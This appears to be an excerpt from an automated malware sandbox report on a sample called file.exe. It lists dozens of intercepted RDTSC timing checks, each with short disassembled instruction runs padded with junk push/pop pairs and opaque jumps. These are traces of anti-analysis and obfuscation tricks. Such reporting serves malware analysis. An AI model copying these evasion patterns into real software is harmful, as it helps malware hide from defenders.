Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24A8B second address: F24A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24A97 second address: F24A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24A9B second address: F24AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC221A94B2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24E9C second address: F24EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 jmp 00007FC220745E06h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push edi 0x00000010 ja 00007FC220745DF6h 0x00000016 jo 00007FC220745DF6h 0x0000001c pop edi 0x0000001d jl 00007FC220745DFAh 0x00000023 push eax 0x00000024 pop eax 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 pushad 0x00000031 push edx 0x00000032 pop edx 0x00000033 pushad 0x00000034 popad 0x00000035 jnp 00007FC220745DF6h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24EE9 second address: F24EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24EEF second address: F24EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24EF5 second address: F24EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1046B second address: F10475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC220745DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E104 second address: F2E108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E427 second address: F2E43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FC220745DFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E43E second address: F2E444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E444 second address: F2E448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E5B3 second address: F2E5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DB80 second address: F2DB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DB8A second address: F2DB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DB95 second address: F2DB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E8E3 second address: F2E8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC221A94B26h 0x0000000a jmp 00007FC221A94B2Eh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F334B4 second address: F334B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F334B8 second address: F334BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33639 second address: F33643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC220745DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33BDC second address: F33BE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33E44 second address: F33E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FC220745DF6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC220745E01h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33FAB second address: F33FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3422E second address: F34232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34232 second address: F34256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC221A94B39h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED94FE second address: ED9504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9504 second address: ED9508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4E4 second address: EFC4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4E8 second address: EFC4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4F6 second address: EFC4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4FA second address: EFC504 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC504 second address: EFC50E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC220745DFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC50E second address: ED8A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jno 00007FC221A94B28h 0x0000000d call dword ptr [ebp+122D2688h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC5AC second address: EFC5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC220745E0Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC5CF second address: EFC5D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC5D4 second address: EFC5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA2C second address: EFCA36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA36 second address: EFCA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA3A second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr [ebp+122D04E9h] 0x00000010 xor dx, 45BCh 0x00000015 mov ecx, dword ptr [ebp+122D2B4Ah] 0x0000001b call dword ptr [ebp+122D2819h] 0x00000021 pushad 0x00000022 jmp 00007FC221A94B37h 0x00000027 xor eax, eax 0x00000029 jmp 00007FC221A94B34h 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 stc 0x00000033 sub dword ptr [ebp+122D2F78h], edi 0x00000039 mov dword ptr [ebp+122D2B56h], eax 0x0000003f jmp 00007FC221A94B2Eh 0x00000044 mov esi, 0000003Ch 0x00000049 mov dword ptr [ebp+122D19E9h], edi 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 jno 00007FC221A94B2Ch 0x00000059 lodsw 0x0000005b pushad 0x0000005c jnl 00007FC221A94B2Ch 0x00000062 mov ecx, dword ptr [ebp+122D2B16h] 0x00000068 popad 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D1B69h], edx 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 clc 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jnp 00007FC221A94B3Eh 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCB0B second address: EFCB27 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC220745DFCh 0x00000008 jne 00007FC220745DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push ebx 0x00000013 pushad 0x00000014 jng 00007FC220745DF6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCB27 second address: EFCB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007FC221A94B2Bh 0x0000000f pop eax 0x00000010 and edx, dword ptr [ebp+122D2B7Ah] 0x00000016 push E680D4CBh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jns 00007FC221A94B26h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCC8A second address: EFCC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC220745DF6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCC9A second address: EFCCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD50A second address: EFD51F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FC220745DF8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD711 second address: EFD715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD715 second address: EFD778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jnp 00007FC220745E03h 0x0000000e push edx 0x0000000f jmp 00007FC220745DFBh 0x00000014 pop edx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FC220745DF8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov edx, 6CBB1FD8h 0x00000035 lea eax, dword ptr [ebp+1247E294h] 0x0000003b jng 00007FC220745E01h 0x00000041 js 00007FC220745DFBh 0x00000047 adc dx, 4B63h 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD778 second address: EFD77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD77C second address: EFD7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FC220745DFDh 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FC220745DF8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D1BE4h], ecx 0x00000031 lea eax, dword ptr [ebp+1247E250h] 0x00000037 add edx, dword ptr [ebp+122D251Ch] 0x0000003d nop 0x0000003e jo 00007FC220745DFEh 0x00000044 push esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD7D6 second address: ED94FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jnc 00007FC221A94B40h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FC221A94B28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov di, B41Dh 0x0000002b call dword ptr [ebp+122D27F4h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FC221A94B2Bh 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38A15 second address: F38A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38A19 second address: F38A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnl 00007FC221A94B26h 0x00000013 jng 00007FC221A94B26h 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FC221A94B31h 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38B99 second address: F38BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFDh 0x00000009 jne 00007FC220745E08h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38D18 second address: F38D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C552 second address: F3C558 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C558 second address: F3C585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC221A94B32h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FC221A94B26h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007FC221A94B3Ch 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C585 second address: F3C593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB62D1 second address: EB62D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E7A1 second address: F3E7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E7B1 second address: F3E7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jo 00007FC221A94B2Ch 0x0000000d jno 00007FC221A94B26h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FC221A94B26h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41B55 second address: F41B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41B59 second address: F41B78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41B78 second address: F41B99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC220745E07h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41B99 second address: F41BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B33h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41363 second address: F4136D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC220745DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4136D second address: F41373 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41373 second address: F41394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E01h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC220745DF6h 0x0000000f jp 00007FC220745DF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41394 second address: F4139A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4139A second address: F413E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC220745E06h 0x0000000f push edx 0x00000010 jmp 00007FC220745E00h 0x00000015 jmp 00007FC220745E05h 0x0000001a pop edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4157A second address: F41590 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FC221A94B26h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC221A94B2Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F416E0 second address: F416E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45CAB second address: F45CD5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B40h 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FC221A94B26h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45CD5 second address: F45D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FC220745E01h 0x00000013 jmp 00007FC220745E01h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4592E second address: F45932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45932 second address: F45936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45936 second address: F45957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45957 second address: F4595B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4595B second address: F459BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FC221A94B2Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jnc 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B2Ah 0x0000001e popad 0x0000001f jl 00007FC221A94B54h 0x00000025 jc 00007FC221A94B3Eh 0x0000002b jmp 00007FC221A94B36h 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 jnc 00007FC221A94B26h 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4748F second address: F474B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC220745DFBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC220745E01h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4B3C2 second address: F4B3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C9CD second address: F4C9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C9D3 second address: F4C9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C9D9 second address: F4C9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50DAA second address: F50DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FC221A94B30h 0x00000011 jmp 00007FC221A94B2Ah 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50DD1 second address: F50DE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5106B second address: F51075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC221A94B26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5130B second address: F5130F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
